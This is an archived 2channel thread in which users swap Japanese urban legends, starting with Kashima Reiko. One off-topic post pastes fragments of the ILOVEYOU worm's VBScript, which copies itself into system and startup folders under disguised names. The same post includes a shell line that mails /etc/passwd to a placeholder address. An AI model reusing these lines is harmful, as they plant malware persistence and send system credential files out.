2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【都市】かしまれいこの呪い・・・【伝説】

1 :人面犬:2005/04/17(日) 14:51:47
先日、本屋で立ち読みをしていると懐かしい名前が・・・。
その名は 「か し ま れ い こ」。
そう、もう35年近く前、小生が小学生時代に有名だった
都市伝説、幽霊?キャラでした。
その都市伝説が、いまでも生きていたことに驚きました。
かしまれいこは、口裂け女や花子さん、貞子の原型なのか?

そこで、皆さんの印象的な都市伝説を雑談するスレです。
地域性もあり、多くの都市伝説があると思うから。

2 :名無しさん@お腹いっぱい。:2005/04/17(日) 14:52:51
かづきれいこ なら知ってまつ

3 :名無しさん@お腹いっぱい。:2005/04/17(日) 14:53:11
たかしまでしょ

4 :名無しさん@お腹いっぱい。:2005/04/17(日) 14:53:31
いいえ
かづきれいこ

5 :人面犬:2005/04/17(日) 14:54:38
真面目にやれぇ〜〜〜(^^;)

6 :名無しさん@お腹いっぱい。:2005/04/17(日) 14:55:30
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"



7 :名無しさん@お腹いっぱい。:2005/04/17(日) 14:59:38
和歌山に住んでた子供時代、
近所にヨガジジイがいた。
広間から空き地で、パンツ一丁でヨガらしき
あやしい体操をしていたので、子供たちにヨガジジイって
バカにされていた。
いま思うと、ジジイじゃなく、40代かもしれない。

8 :名無しさん@お腹いっぱい。:2005/04/17(日) 15:03:25
悦司も都市伝説になるんじゃね?

9 :名無しさん@お腹いっぱい。:2005/04/17(日) 15:04:26
どこでも親衛隊かw

10 :名無しさん@お腹いっぱい。:2005/04/17(日) 15:06:44
>>7
それ、悦司だから・・・

11 :名無しさん@お腹いっぱい。:2005/04/21(木) 21:29:11
コートおじさんは、どこにでもいるだろ?

12 :名無しさん@お腹いっぱい。:2005/04/22(金) 01:12:26
Dr.

13 :名無しさん@お腹いっぱい。:2005/04/22(金) 01:38:59
精霊都市

14 :名無しさん@お腹いっぱい。:2005/04/24(日) 10:45:53
山形県に子供時代育ったんだけど、
うちのおじいちゃんは、酔うとよく河童を見たという話しをしてたなあ。
それが、すごくリアルで、いかにも本当のことのように話してた。

真面目な堅い人で、うそをつくような人じゃなかったし、惚けても
いなかった。
河童は想像上の動物じゃなく、実際にいるんだと言っていた。
おじいちゃんの見たものは、何だったんだろうか?

15 :名無しさん@お腹いっぱい。:2005/04/24(日) 22:17:11
た、ぬきなのか?

16 :名無しさん@お腹いっぱい。:2005/05/07(土) 20:22:34
口裂け女なら、みたことあるぞ。

17 :名無しさん@お腹いっぱい。:2005/05/07(土) 20:39:34
かしまれいこって誰?

18 :名無しさん@お腹いっぱい。:2005/05/14(土) 00:22:24
>>17
口裂け女の原型。
口裂け女の本名。

19 :名無しさん@お腹いっぱい。:2005/05/14(土) 09:50:45
スッチーじゃなかったっけ?

4 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)